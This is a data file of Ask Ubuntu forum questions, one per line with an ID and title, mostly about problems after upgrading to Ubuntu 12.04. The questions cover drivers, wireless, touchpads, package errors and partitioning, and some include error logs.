126961	is the update manager release upgrade path generally fire-and-forget ?	i am thinking of upgrading to the new 12.04 ubuntu release . on my last upgrade i did it from cd but i got into a bit of a tangle ( although i did fix it in the end ) , so this time i 'm planning on doing it online via the update manager instead . however , my question is this : is doing an upgrade via update manager generally a `` fire-and-forget '' process ? in other words , can i set it going before going to bed , and then have it ( mostly ) done by the morning ? or is it a process that periodically asks for user input and therefore requires an amount of baby-sitting ? many thanks in advance , thoughton .
126962	what are implications of downloading buggy 12.04 iso	i see from question # 125412 that those who downloaded the 12.04 iso image shortly after release may have got an iso with serious bugs , and if they did not check the md5sum then they would not know this . what are the implications of this ? will they have problems installing or will the install go ok and after updating the bugs will be fixed automatically ?
126963	ia32-libs will not install due to dependency problems	when i upgraded to 12.04 all the 32bit libraries was removed . when i used synaptic to upgrade , synaptic installed all the 32bit libraries . when i later used apt-get to install a ppa , i was told to use autoremove to remove all the 32bit libraries , which i did . after this synaptic wanted to install the libraries again , but now i marked ia32-libs forinstead . the installation works fine , but i am not able to install skype as skype depeneds on ia32-libs . when i try to install ia32-libs , i get this error printout ia32-libs : depends : ia32-libs-multiarch
126965	how to personalize kde menu ?	i would like to personalize the kde menu . i would like to add the ubuntu version and architecture on top of the menu example : kubuntu 12.04 64bit precise pangolin how to do it ? that 's the menu i 'm talking about :
126969	how can we install all the necessary dependencies for a package so that we can build it ?	well , after i installed freecad on my ubuntu 12.04 with the help of this blog i started asking about compiling and building from source . so , when we are trying to install a package some times the terminal or the software center says that some packages are missing . the sudo apt-get build-dep package_name is a general command that finds and installs dependencies right ? my main questions here are from where is it finding the missing packages , repository ? can we use this command for any application ? or only those that the packages are in our repositories ? thanks !
126973	how to upgrade from 10.04 to higher version without cd and usb stick	i want to upgrade from ubuntu 10.04 to a higher version . my optical disk drive is not working neither my system is usb bootable . i do not want to install wubi in windows as my system is dual bootable , both os intalled parallely and i want to keep it as it is . please suggest me the option to upgarde using internet . lat time i upgraded from 9.10 through update manager but this time i ca n't find an option to do so . waitning for ur suggestions . thank u .
126974	how do i install google chrome dev version ?	i want to install google chrome nightly ( the dev version ) next to the stable version . is there a ppa for nightly and 12.04 ? these are the only ppas i found and they are not working on 12.04 yet .
126980	how do i install groovy ?	when i try to run this : sudo apt-get install groovy i get this big error : setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-04-28 18:43:39 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 96.17.181.40 , 96.17.181.49 connecting to download.oracle.com ( download.oracle.com ) |96.17.181.40|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ following ] -- 2012-04-28 18:43:39 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 184.50.22.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |184.50.22.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-04-28 18:43:40 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |96.17.181.40|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-i586.tar.gz' 0k ... .. 100 % 47.2k=0.1s 2012-04-28 18:43:40 ( 47.2 kb/s ) - `./jdk-7u3-linux-i586.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of groovy : groovy depends on default-jre-headless | sun-java6-jre ; however : package default-jre-headless is not installed . package oracle-java7-installer which provides default-jre-headless is not configured yet . package sun-java6-jre is not installed . dpkg : error processing groovy ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : oracle-java7-installer groovy e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i already have java installed in my pc . when i run : java -version i get : java version `` 1.7.0_04 '' java ( tm ) se runtime environment ( build 1.7.0_04-b20 ) java hotspot ( tm ) server vm ( build 23.0-b21 , mixed mode ) where i 'm making mistake ? thanks in advance .
126985	low resolution on `` shut down '' screen	i have installed ubuntu 12.04 and everything runs fine and the resolution is correct when i am at the desktop etc . however the purple screen that appear when you shut down with the dots ticking is in low resolution ( probably 800x600 ) or something . is this correct behaviour or do i need to fix something ?
126988	upgrade from 11.10 to 12.10 directly without upgrading to12.04	can i upgrade from 11.10 to 12.10 directly without upgrading to the 12.04 lts version ? or is it a compulsion to upgrade to 12.04 ?
126992	ubuntu 12.04 upgrade	i upgraded from 11.10 to 12.04 but as i left the computer on for the download the power supply was cut down by a power breakdown so when i turned on ubuntu it said there was a partial upgrade and there was this error and they told me to do this sudo apt-get install -f and after that the upgrade manager started installing 12.04 and when it was done and i restarted it was odd like this was like a in between i couldnt resize the launcher tomboy and banshee are still here the hud is there so now im stuck between two versions please help me out of this mess i do have the 11.10 live cd should i try it first
126994	how to disable blinking screen on 12.04 with gnome3 ?	i use ubuntu 12.04 with gnome3 . whenever i press backspace in terminal ( no text to delete ) it gives me a sound and blinks the screen . i disabled the sound using system settings - > sound - > sound effects - > alert volume - > off but i do n't know how to disable the blinking screen . how to disable it ?
126995	sudo fails because of `pam_mount.c` assertion	i just upgraded to kubuntu 12.04 from 11.10 . now when i use sudo i almost always get : sudo : pam_mount.c:417 : modify_pm_count : assertion `user ! = ( ( void * ) 0 ) ' failed . it makes the command fail . what is up with that and how can i fix it ?
127003	how to allow only one entry instance for netbeans/eclipse in unity launcher ?	i created a netbeans.desktop and eclipse.desktop and added them to unity launcher and did exactly the same for eclipse & netbeans here : how do i install eclipse indigo 3.7.1 ? in order to run it from terminal or dashboard . the problem is that if i run them from dashboard or terminal , another entry is displayed in the launcher . is there any solution so that when i run the ides from dashboard or terminal , only the launcher entry already pinned , is used ? thanks in advance .
127008	backlight issue - samsung rv509 notebook	i installed ubuntu 12.04 today on my samsung rv509 notebook ( nvidia geforce 315m ) and the backlight brightness controls do n't work on it . i did some digging around the web and found the samsung tools voria repository and installed samsung-backlight package from there . this did n't help though . i see that the nvidia drivers are in use . any help or pointers are appreciated .
127013	boot failure after shutdown during upgrade from 11.10 to 12.04	during the upgrade process xubuntu downloaded all of the necessary files then it said i needed to disable the screensaver before continuing . i could n't get to the screensaver settings , so i shutdown the computer figuring i 'd do the upgrade the next day . now , ubuntu wo n't boot , and it gives the following error glibc_2.14 is not found , and a maintenance shell is launched how do i fix this ?
127016	pinta installs but wont load a gui	pinta paint program installs from software center , but doesnt load from launcher icon , or load from applications folder icon , or terminal . i 'm running ubuntu 12.04 on an intel atom dual core machine with 2 gigs of ram and nvidia ion graphics , using the nvidia driver . output of pinta : unhandled exception : system.argumentexception : 'gtk-close ' is not a valid resource name of assembly 'pinta.resources , version=1.1.0.0 , culture=neutral , publickeytoken=null ' . at gdk.pixbufloader.initfromassemblyresource ( system.reflection.assembly assembly , system.string resource ) [ 0x00000 ] in < filename unknown > :0 at gdk.pixbufloader..ctor ( system.reflection.assembly assembly , system.string resource ) [ 0x00000 ] in < filename unknown > :0 at gdk.pixbuf..ctor ( system.reflection.assembly assembly , system.string resource ) [ 0x00000 ] in < filename unknown > :0 at gdk.pixbuf.loadfromresource ( system.string resource ) [ 0x00000 ] in < filename unknown > :0 at pinta.resources.resourceloader.geticon ( system.string name , int32 size ) [ 0x00000 ] in < filename unknown > :0 at pinta.resourcemanager.geticon ( system.string name , int32 size ) [ 0x00000 ] in < filename unknown > :0 at pinta.resourcemanager.geticon ( system.string name ) [ 0x00000 ] in < filename unknown > :0 at pinta.gui.widgets.openimageslistwidget..ctor ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.openimagespad.initialize ( monodevelop.components.docking.dockframe workspace , gtk.menu padmenu ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow.createdockandpads ( gtk.hbox container ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow.createpanels ( pinta.windowshell shell ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow.createwindow ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow..ctor ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainclass.main ( system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0 [ error ] fatal unhandled exception : system.argumentexception : 'gtk-close ' is not a valid resource name of assembly 'pinta.resources , version=1.1.0.0 , culture=neutral , publickeytoken=null ' . at gdk.pixbufloader.initfromassemblyresource ( system.reflection.assembly assembly , system.string resource ) [ 0x00000 ] in < filename unknown > :0 at gdk.pixbufloader..ctor ( system.reflection.assembly assembly , system.string resource ) [ 0x00000 ] in < filename unknown > :0 at gdk.pixbuf..ctor ( system.reflection.assembly assembly , system.string resource ) [ 0x00000 ] in < filename unknown > :0 at gdk.pixbuf.loadfromresource ( system.string resource ) [ 0x00000 ] in < filename unknown > :0 at pinta.resources.resourceloader.geticon ( system.string name , int32 size ) [ 0x00000 ] in < filename unknown > :0 at pinta.resourcemanager.geticon ( system.string name , int32 size ) [ 0x00000 ] in < filename unknown > :0 at pinta.resourcemanager.geticon ( system.string name ) [ 0x00000 ] in < filename unknown > :0 at pinta.gui.widgets.openimageslistwidget..ctor ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.openimagespad.initialize ( monodevelop.components.docking.dockframe workspace , gtk.menu padmenu ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow.createdockandpads ( gtk.hbox container ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow.createpanels ( pinta.windowshell shell ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow.createwindow ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow..ctor ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainclass.main ( system.string [ ] args ) [ 0x00000 ] in < filename unknown > :0
127021	no desktop after installing graphic drivers ?	i 've installed ubuntu 12.04 with wubi . after installing graphic drivers when i reboot and log back in all i can see is black background and cursor is n't moving ( but right-click is working ) , unity launcher is absent . i tried 3-5 times without any luck . so , how can i reinstall/repair ubuntu 12.04 ?
127024	i can not see the new unity greeter after updated ubuntu to 12.04	i have just updated my ubuntu , but the login screen has not changed to the new fancy greeter . how can i activate the new greeter ? thx , edi
127027	how to remove qgvdial ( qt google voice dialer ) ?	i 've been having problems trying to remove qgvdial ( qt google voice dialer ) since 11.04 and now i 'm at 12.04 with still the same problem . i get the following error : dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : qgvdial e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas ?
127028	no wireless connection on an acer aspire 5935g with an intel 5100 agn	i have a acer aspire 5935g with intel 5100 agn wireless card which used to work properly under ubuntu 11.10 . while using the live cd of ubuntu 12.04 and also now that i have ubuntu 12.04 installed on my machine i can connect to my wireless network but i can not access any address , even the address of the router . what can i do about it ?
127035	wine not working in 12.04 ?	i updated to ubuntu 12.04 by doing a clean install from a cd . i installed wine , q4wine , winetricks , playonlinux all from the software center . after installing kindle for pc ( i ran it in 11.10 as well ) wine does n't open it . then i tried to install a game ( eastside hockey manager 2007 ) that i have had installed on all my previous versions of ubuntu , again wine returned an error saying that the installer gui would not load . so far i 'm lost as to why this is happening . does anyone have an idea ?
127042	unable to fetch some archives with apt-get ?	i try to use at-get update but it gives that error message : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : traceroute 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 54,3 kb of archives . after this operation , 201 kb of additional disk space will be used . err http : //archive.ubuntu.com/ubuntu/ oneiric/universe traceroute amd64 1:2.0.15-1 could not connect to 127.0.0.1:8008 ( 127.0.0.1 ) . - connect ( 111 : connection refused ) failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/t/traceroute/traceroute_2.0.15-1_amd64.deb could not connect to 127.0.0.1:8008 ( 127.0.0.1 ) . - connect ( 111 : connection refused ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i guess there is a network problem but can not find the problem . do you have suggestion ?
127043	ubuntu 12.04 dual displays not working	i just installed ubuntu 12.04 . i am having trouble setting up my nvidia settings . i have a monitor connected to the dvi port and a sony tv connected to the hdmi . i am trying to set up the displays with the tv to the `` right of '' the monitor . this worked fine in xubuntu 11.10 . now when i setup using separate x screens , write the xorg.conf and reboot , my monitor works fine and tv has a gray screen with an x mouse cursor . basically looks like the window manager has failed . if i setup using twinview it appears to work . however , ubuntu 's display settings only show my one very wide display ( 3520 x 1080 ) and calls it `` laptop '' . when i try to run xbmc in full screen mode , it is stretched across both displays . this is driving me crazy ! please help !
127048	what would happen if my power trips while i 'm installing ubuntu ?	as the title says , what would happen if , while installing ubuntu 12.04 ( or any version ) , my electricity trips and my pc turns off . will i need to reboot from the dvd and install from scratch ? and would my previous installation attempt be corrupted ? it 's not happened to me , but i 've often wondered .
127049	help trying to get two-finger scrolling to work on asus ul80vt	multi-touch works fine on windows 7 with : two-fingers scroll vertical and horizontally , two-finger tap for middle click , and three-finger tap for right click . however with ubuntu , i 've never been able to get multi-touch to `` save '' and work , i was able to get it to work a few times but after restarting - it would just reset back . i have the settings for two-finger scrolling on : mouse and touchpad > touchpad two-finger scrolling ( selected ) enable horizontal scrolling ( ticked ) the cursor stops moving when i try to scroll with two fingers , but it does n't actually scroll the page . when i perform xinput list , i get : virtual core pointer id=2 [ master pointer ( 3 ) ] ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ etps/2 elantech etf0401 id=13 [ slave pointer ( 2 ) ] i 've tried to install some 'synaptics-dkms ' bug-fix ( from a few years back ) but that did n't work , so i removed that . i 've tried installing 'utouch ' but that did n't seem to do anything so removed it . here 's what i have installed now : dpkg -- get-selections > installed-software grep 'touch\|mouse\|track\|synapt ' installed-software libsoundtouch0 -- - install libutouch-evemu1 -- - install libutouch-frame1 -- - install libutouch-geis1 -- - install libutouch-grail1 -- - install printer-driver-ptouch -- - install ptouch-driver -- - install xserver-xorg-input-multitouch -- - install xserver-xorg-input-mouse -- - install xserver-xorg-input-vmmouse -- - install libnetfilter-conntrack3 -- - install libxatracker1 -- - install xserver-xorg-input-synaptics -- - install so , i 'll start again , what should i do now to get two-finger scrolling to work and ensure it works after restarting ? also doing : synclient tapbutton1=1 tapbutton2=2 tapbutton3=3 ... works but does n't save after restarting . however doing : synclient verttwofingerscroll=1 horiztwofingerscroll=1 does not work to fix the two-finger scrolling . output of : cat /var/log/xorg.0.log | grep -i synaptics [ 4.576 ] ( ii ) loadmodule : `` synaptics '' [ 4.577 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 4.577 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 4.577 ] ( ii ) using input driver 'synaptics ' for 'etps/2 elantech etf0401' [ 4.577 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 4.584 ] ( -- ) synaptics : etps/2 elantech etf0401 : x-axis range 0 - 1088 [ 4.584 ] ( -- ) synaptics : etps/2 elantech etf0401 : y-axis range 0 - 704 [ 4.584 ] ( -- ) synaptics : etps/2 elantech etf0401 : pressure range 0 - 255 [ 4.584 ] ( -- ) synaptics : etps/2 elantech etf0401 : finger width range 0 - 16 [ 4.584 ] ( -- ) synaptics : etps/2 elantech etf0401 : buttons : left right middle double triple scroll-buttons [ 4.584 ] ( -- ) synaptics : etps/2 elantech etf0401 : vendor 0x2 product 0xe [ 4.584 ] ( -- ) synaptics : etps/2 elantech etf0401 : touchpad found [ 4.588 ] ( ** ) synaptics : etps/2 elantech etf0401 : ( accel ) minspeed is now constant deceleration 2.5 [ 4.588 ] ( ** ) synaptics : etps/2 elantech etf0401 : maxspeed is now 1.75 [ 4.588 ] ( ** ) synaptics : etps/2 elantech etf0401 : accelfactor is now 0.154 [ 4.589 ] ( -- ) synaptics : etps/2 elantech etf0401 : touchpad found tried installing synaptiks but that did n't seem to work either , so removed it . temporary fix ( works until i restart ) doing the following commands : modprobe -r psmouse modprobe psmouse proto=imps works but now xinput list shows up as : virtual core pointer id=2 [ master pointer ( 3 ) ] ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ imps/2 generic wheel mouse id=13 [ slave pointer ( 2 ) ] instead of elantech , and it gets reset when i reboot . solution ( not ideal for most people ) so , i ended up reinstalling a fresh 12.04 after indirectly playing around with burg and plymouth then removing plymouth which removed 50+ packages ( i saw the warnings but was way too tired and assumed i could just 'reinstall ' them all after ( except that did n't work ) . right now xinput list shows up as : ⎡ virtual core pointer -- - id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer -- - id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad -- - id=13 [ slave pointer ( 2 ) ] grep 'touch\|mouse\|track\|synapt ' installed-software libnetfilter-conntrack3 -- - install libsoundtouch0 -- - install libutouch-evemu1 -- - install libutouch-frame1 -- - install libutouch-geis1 -- - install libutouch-grail1 -- - install libxatracker1 -- - install mousetweaks -- - install printer-driver-ptouch -- - install xserver-xorg-input-mouse -- - install xserver-xorg-input-synaptics -- - install xserver-xorg-input-vmmouse -- - install cat /var/log/xorg.0.log | grep -i synaptics [ 4.890 ] ( ii ) loadmodule : `` synaptics '' [ 4.891 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 4.892 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 4.892 ] ( ii ) using input driver 'synaptics ' for 'etps/2 elantech touchpad' [ 4.892 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 4.956 ] ( ii ) synaptics : etps/2 elantech touchpad : ignoring touch events for semi-multitouch device [ 4.956 ] ( -- ) synaptics : etps/2 elantech touchpad : x-axis range 0 - 1088 [ 4.956 ] ( -- ) synaptics : etps/2 elantech touchpad : y-axis range 0 - 704 [ 4.956 ] ( -- ) synaptics : etps/2 elantech touchpad : pressure range 0 - 255 [ 4.956 ] ( -- ) synaptics : etps/2 elantech touchpad : finger width range 0 - 15 [ 4.956 ] ( -- ) synaptics : etps/2 elantech touchpad : buttons : left right double triple [ 4.956 ] ( -- ) synaptics : etps/2 elantech touchpad : vendor 0x2 product 0xe [ 4.956 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found [ 4.980 ] ( ) synaptics : etps/2 elantech touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 4.980 ] ( ) synaptics : etps/2 elantech touchpad : maxspeed is now 1.75 [ 4.980 ] ( ** ) synaptics : etps/2 elantech touchpad : accelfactor is now 0.154 [ 4.980 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found so , if all else fails , reinstall linux : /
127051	nvidia driver problem with 12.04	i have just updated to 12.04 but on reboot , i only have one display working and can not change the resolution on this . i have tried to activate the nvidia driver but get the following error ... ..sorry , the installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log i am e newbie and am a bit lost as to what to do from here . any help appreciated ... thanks .
127056	where is .bashrc ?	i feel stupid asking , but i ca n't seem to find the answer to this anywhere . i 'm trying to follow these instructions to edit my bash prompt , but there is no .bashrc in either my user directory ( ~/.bashrc ) , or in my home directory , or in the main file system directory . there is no .bashrc in /etc/ ( there is a bash.bashrc , however ) . do i create a .bashrc file in my user or home directory ? is there a better , more recent set of instructions for modifying the bash prompt ?
127063	qbittorent : ошибка доступа к ntfs разделам - nfts error	после установки 12.04 возникла проблема с этим торрент-клиентом . выдает ошибку ввода-вывода при работе с ntfs разделами . в логе следующее : 28/04/2012 19:21:26 - причина : cities in motion [ lossless repack ] by rg packers file ( /media/win/игры/cities in motion [ lossless repack ] by rg packers/data1.bin ) error : операция не позволяется как исправить ? english from google translate : after installing the 4.12 there was a problem with the torrent client . an error in the input-output work with ntfs partitions . in the log the following : 04/28/2012 19:21:26 - reason : cities in motion [ lossless repack ] by rg packers file ( / media / win / games / cities in motion [ lossless repack ] by rg packers/data1.bin ) error : operation not allowed
127064	vmware player compile issue	vmware worked ok before i updated to ubuntu 12.04 , when i try to run vmware player it says that it needs to compile and load into the running kernel , using vmware kernel model updater . it successfully compiles the following : virtual machine monitor , vmware blocking filesystem , virtual machine communications interface and the vmci sockets . but it does compile the virtual network device and therefore will not start the vmware services . is this a know issue and how do you fix it ?
127066	eclipse is n't working after upgrading from 11.10 to 12.04	after i 've upgraded my ubuntu 11.10 to 12.04 eclipse fail to launch and gives me an error message telling me to see the log file . here 's the log file ! session 2012-04-28 17:24:33.607 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86 ! entry org.eclipse.osgi 4 0 2012-04-28 17:24:35.779 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/leo/.swt/lib/linux/x86/libswt-gtk-3740.so ca n't load library : /home/leo/.swt/lib/linux/x86/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 )
127071	`` additional drivers '' program crash help on 12.04 ?	when i select the `` additional drivers '' program , it searches for available drivers but becomes unresponsive shortly after . i tried closing it , to try again , but now it just blinks 3 times when i select it . any ideas to work around this ? i 'm unsure if there 's a driver i need . my network connection seems fine , though . edit : when i use the command jockey-gtk , i get an error message that ends with : possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken .
127073	is there any way to install a different gui on 12.04 ?	having switched from 10.10 to 12.04 , i find the new gui confusing and hard to use , particularly in the area of accessing applications . both the launcher and dash throw everything in together , dash is inconsistent and frequently refuses to display anything but recently accessed applications and files , leaving me with only what few i can access with the launcher . the hierarchical menus ( categories , then applications for the selected category ) were simpler and much easier to use , and i could build my own launcher simply by dragging icons for frequently used apps to the tool bar at the top . switching workspaces was done by clicking an icon on the bar on the bottom , and required only a single click . switching workspaces on 12.4 requires banging the cursor repeatedly on the left side of the screen to bring up the launcher , then finding and clicking the workspace app , clicking it , waiting for the desktop to divide , then clicking the space you want , then clicking it yet again to bring it to full screen . a royal pain in the butt . is there any way to install a different gui , preferably the same as or similar to 10.10 gui ? i tried installing the gnome desktop but all that did was greatly lengthen boot time . no change in the gui .
127074	gparted ca n't create partition table	here 's what the problem is . about a day or so ago i used gparted live cd to create 3 ntfs primary partitions on my external 500 gig goflex and one extended with 2 logical partitiones . i had planned to install windows 8 on the first partition , then ubuntu and kubuntu on the other 2 . after i finished partitioning my drive with gparted , i booted into windows vista to make my bootable windows 8 usb to install it with , i also decided to check to make sure all my partitions were working properly . then i found they were , and they were n't . my 50 gig first partition i had planned to install windows on showed up normal and the 300 gigs of space left in the extended partition did as well , the rest showed up as raw . so i figured alright , something went awal while making the partitions , so i booted up gparted once again . then to my surprise gparted showed the entire drive as unallocated , and when i refreshed the list , it showed as all the partitions i had made earlier , buy with a exclamation mark by them all . so i figured ok , might be a problem with the partition table as i 'd seen a similar problem in past on a drive that was not partitioned at all , so i decided to create a new partition table and take the time out again to sit and wait . then i got a message saying gparted could not create the partition table , followed by it showing the entire drive as formatted into ntfs . after that i figured ok i 'll take a break , come back in a hour , maybe it 's something i did . so a hour later i came back after having booted up windows , plugged the drive in to see if by some miracle windows could access the drive . in disk management when i plugged the drive in , it would freeze attempting to read the drive , as i 'd seen in the past with raw disks , yet when i unplugged it i got a glimpse of disk management showing it as a perfectly fine ntfs file system on the drive followed by a `` you must format disk k in order to use it '' . so i then was assured the disk was raw as that is what had happened in the past , followed by a new partition table through gparted to fix the problem and a 10 hour format in windows . so i once again booted up gparted , to get the message `` error fsyncing/closing/dev/sdg : input/output error '' followed by `` error opening dev/sdg no such file in directory '' after i refreshed and somehow saw the disk show up as perfectly fine ntfs and then tried to create a new partition table to try to wipe out all my problems and start over again . and not gparted only shows the drive there about 1/10 refreshes the rest i get the directory error . if anybody can assist me in any way shape or form i will be thankful .
127083	when i install xubuntu 12.04 , the qt-applications font is horrible	what is the proper way to set up fonts in skype , vlc , and so on ?
127086	can i use gparted to repartition my drive in order that i can install windows 7 on a portion of the drive and have a dual-boot system ?	i have used ubuntu 11.10 successfully for several months . today , i am installing the 12.04 lts upgrade . it 's been a while since i set up an old lenovo thinkpad t60 with ubuntu . windows xp was formerly only the machine , but it crashed beyond repair . therefore , as i recollect , i formatted the disk to serve only as an ubuntu machine . recently , i have had the opportunity to test drive windows 7 professional , and i like it . my question is `` can i use gparted to repartition my drive in order that i can install windows 7 on a portion of the drive and have a dual-boot system ? '' if gparted is not the preferred utility for accomplishing this task , what partition management software would you recommend ? thanks very much for your suggestions .
127089	after upgrading to 12.04 , installing rhythmbox and uninstalling banshee music lens does n't open any audio	i can search in music , but when i click at any icon in music lens or in music scope for home lens , it does nothing and do n't disappears . but i still can open music files from files lens or from nautilus . how to solve this problem ? is n't it a bug ? thank you .
127093	wi-fi continually asks me to reenter the password ; how do i fix this ?	sorry if this question has been asked before ; if it has , i could n't find it . on 12.04 i 'm able to connect to wi-fi and load pages on the internet , but i 'm asked to reenter the wi-fi password every ten seconds . if i reenter it , it connects again just fine , but it asks again in about ten seconds , making the wi-fi essentially unusable . i use a lenovo thinkpad sl510 , if that matters . i never had a similar problem under 11.10 .
127094	dropped wireless connections and reconnections with a broadcom bcm4321	with the newest distribution , beginning yesterday , both of the ubuntu computers on my network that connect via wireless are randomly dropping the connection several times an hour . the connection re-establishes in a few seconds , but it interrupts downloads , browsing , and updates . the windows computer connected via ethernet is not affected by these outages . this did n't happen during the previous several weeks where i had the 12.04 beta version installed ; only beginning yesterday with the new distro . in fact , the connection dropped twice while i was typing this . sudo lshw -class network returns : *-network description : wireless interface product : bcm4321 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : eth3 version : 01 serial : 00:16 : cf : c9:36:50 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 ip=192.168.0.2 latency=0 multicast=yes wireless=ieee 802.11abgn resources : irq:17 memory : efdfc000-efdfffff memory : e0000000-e00fffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth2 version : 02 serial : 00:18:8b : ab : dc : fd size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=half latency=64 link=no multicast=yes port=twisted pair speed=10mbit/s resources : irq:17 memory : ef9fe000-ef9fffff lsusb returns : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 413c : a005 dell computer corp. internal 2.0 hub bus 001 device 003 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 004 : id 413c:8126 dell computer corp. wireless 355 bluetooth bus 001 device 005 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 001 device 006 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) lspci returns : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 